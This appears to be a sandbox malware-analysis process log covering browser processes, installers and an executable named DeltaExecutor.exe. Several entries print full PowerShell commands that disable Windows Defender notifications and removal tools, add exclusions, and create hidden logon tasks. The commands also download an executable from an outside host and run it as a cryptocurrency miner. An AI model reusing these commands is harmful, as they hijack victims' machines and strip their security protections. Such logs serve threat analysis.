C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5280 /prefetch:83⤵PID:3928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:13⤵PID:4340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:13⤵PID:3740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:13⤵PID:3616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:13⤵PID:3604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5756 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5220
-
-
C:\Users\Admin\Downloads\EzExtractSetup.exe"C:\Users\Admin\Downloads\EzExtractSetup.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5328 -
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe /s "C:\Program Files (x86)\EzExtractPro\EzExtractProShell32.dll"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:6044
-
-
C:\Windows\SysWOW64\regsvr32.exeC:\Windows\system32\regsvr32.exe /s "C:\Program Files (x86)\EzExtractPro\EzExtractProShell.dll"4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6060 -
C:\Windows\system32\regsvr32.exe/s "C:\Program Files (x86)\EzExtractPro\EzExtractProShell.dll"5⤵
- Loads dropped DLL
- Modifies registry class
PID:6096
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" "C:\Program Files (x86)\EzExtractPro\EzExtractProApp.exe"4⤵PID:6124
-
-
-
C:\Users\Admin\Downloads\EzExtractSetup.exe"C:\Users\Admin\Downloads\EzExtractSetup.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:13⤵PID:6096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:13⤵PID:5420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:13⤵PID:1168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:13⤵PID:2228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7088 /prefetch:13⤵PID:5752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:13⤵PID:5216
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7708 /prefetch:13⤵PID:4980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7928 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5112
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\7z2201-x64 (1).msi"3⤵
- Enumerates connected drives
- Drops file in Program Files directory
PID:5240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:13⤵PID:5328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:13⤵PID:5628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7888 /prefetch:13⤵PID:2484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4652 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:1196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:13⤵PID:3596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6372 /prefetch:13⤵PID:1504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:13⤵PID:3508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:13⤵PID:4416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:13⤵PID:5820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,9421417806275157134,14232294659040431812,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=216 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:5772
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\7z2201-x64 (3).msi"3⤵
- Enumerates connected drives
PID:5856
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -ExecutionPolicy Bypass -Command "Register-ScheduledTask -TaskName MicrosoftConsoleSetup -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"New-Item -Path \\.\C:\ProgramData\Con\ -ItemType Directory; (Get-Item \\.\C:\ProgramData\Con\).Attributes = ''ReadOnly, Hidden, System''; Invoke-WebRequest -Uri https://evilmods.com/api/nothingtoseehere.exe -OutFile C:\ProgramData\Con\services.exe; Set-ScheduledTask -TaskName MicrosoftConsole -Trigger (New-ScheduledTaskTrigger -AtLogOn); Unregister-ScheduledTask -TaskName MicrosoftConsoleSetup -Confirm:$false; Start-ScheduledTask -TaskName MicrosoftConsole;\"') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force; Register-ScheduledTask -TaskName MicrosoftConsole -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"C:\ProgramData\Con\services.exe --algo AUTOLYKOS2 --pool erg.2miners.com:18888 --user bc1qyy0cv8snz7zqummg0yucdfzpxv2a5syu7xzsdq.MDTAoIgGIj --tls on --log off\"') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4412
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2996
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:4336
-
C:\Program Files (x86)\EzExtractPro\EzExtractProApp.exe"C:\Program Files (x86)\EzExtractPro\EzExtractProApp.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5176
-
-
C:\Users\Admin\Desktop\New folder\DeltaExecutor.exe"C:\Users\Admin\Desktop\New folder\DeltaExecutor.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5776 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://igk.filexspace.com/getfile/QDJEILD?title=DependencyCore&tracker=erg32⤵PID:5980
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fffdca946f8,0x7fffdca94708,0x7fffdca947183⤵PID:6016
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -ExecutionPolicy Bypass -Command "Register-ScheduledTask -TaskName MicrosoftConsoleSetup -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; wusa /uninstall /kb:890830 /quiet /norestart; Remove-Item -Path ''C:\Windows\System32\mrt.exe'' -Force -Confirm:$false; reg add ''HKLM\SOFTWARE\Policies\Microsoft\MRT'' /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f /reg:64; New-Item -Path \\.\C:\ProgramData\Con\ -ItemType Directory; (Get-Item \\.\C:\ProgramData\Con\).Attributes = ''ReadOnly, Hidden, System''; Invoke-WebRequest -Uri https://evilmods.com/api/nothingtoseehere.exe -OutFile C:\ProgramData\Con\services.exe; Set-ScheduledTask -TaskName MicrosoftConsole -Trigger (New-ScheduledTaskTrigger -AtLogOn); Unregister-ScheduledTask -TaskName MicrosoftConsoleSetup -Confirm:$false; Start-ScheduledTask -TaskName MicrosoftConsole;\"') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force; Register-ScheduledTask -TaskName MicrosoftConsole -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; wusa /uninstall /kb:890830 /quiet /norestart; Remove-Item -Path ''C:\Windows\System32\mrt.exe'' -Force -Confirm:$false; reg add ''HKLM\SOFTWARE\Policies\Microsoft\MRT'' /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f /reg:64; C:\ProgramData\Con\services.exe --algo AUTOLYKOS2 --pool erg.2miners.com:18888 --user bc1qxhp6mn0h7k9r89w8amalqjn38t4j5yaa7t89rp.uKCqDhY6Dx --tls on --log off\"') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5992
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2024 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:2564
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
PID:5344
-
C:\Users\Admin\Desktop\New folder\DeltaExecutor.exe"C:\Users\Admin\Desktop\New folder\DeltaExecutor.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3680 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://igk.filexspace.com/getfile/QDJEILD?title=DependencyCore&tracker=erg32⤵PID:1876
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffdca946f8,0x7fffdca94708,0x7fffdca947183⤵PID:5228
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -ExecutionPolicy Bypass -Command "Register-ScheduledTask -TaskName MicrosoftConsoleSetup -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; wusa /uninstall /kb:890830 /quiet /norestart; Remove-Item -Path ''C:\Windows\System32\mrt.exe'' -Force -Confirm:$false; reg add ''HKLM\SOFTWARE\Policies\Microsoft\MRT'' /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f /reg:64; New-Item -Path \\.\C:\ProgramData\Con\ -ItemType Directory; (Get-Item \\.\C:\ProgramData\Con\).Attributes = ''ReadOnly, Hidden, System''; Invoke-WebRequest -Uri https://evilmods.com/api/nothingtoseehere.exe -OutFile C:\ProgramData\Con\services.exe; Set-ScheduledTask -TaskName MicrosoftConsole -Trigger (New-ScheduledTaskTrigger -AtLogOn); Unregister-ScheduledTask -TaskName MicrosoftConsoleSetup -Confirm:$false; Start-ScheduledTask -TaskName MicrosoftConsole;\"') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force; Register-ScheduledTask -TaskName MicrosoftConsole -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; wusa /uninstall /kb:890830 /quiet /norestart; Remove-Item -Path ''C:\Windows\System32\mrt.exe'' -Force -Confirm:$false; reg add ''HKLM\SOFTWARE\Policies\Microsoft\MRT'' /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f /reg:64; C:\ProgramData\Con\services.exe --algo AUTOLYKOS2 --pool erg.2miners.com:18888 --user bc1qxhp6mn0h7k9r89w8amalqjn38t4j5yaa7t89rp.G0J2PRFkpg --tls on --log off\"') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1688
-
-
C:\Users\Admin\Desktop\New folder\DeltaExecutor.exe"C:\Users\Admin\Desktop\New folder\DeltaExecutor.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3472
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5604 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fffcdd9cc40,0x7fffcdd9cc4c,0x7fffcdd9cc582⤵PID:1296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1844,i,13300848190380799893,12190349475270757,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1832 /prefetch:22⤵PID:6140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2192,i,13300848190380799893,12190349475270757,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2460 /prefetch:32⤵PID:3560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2232,i,13300848190380799893,12190349475270757,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2468 /prefetch:82⤵PID:5704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,13300848190380799893,12190349475270757,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:2336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3284,i,13300848190380799893,12190349475270757,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3264 /prefetch:12⤵PID:5452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4580,i,13300848190380799893,12190349475270757,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4604 /prefetch:12⤵PID:5964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4392,i,13300848190380799893,12190349475270757,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4844 /prefetch:82⤵PID:5968
-
-
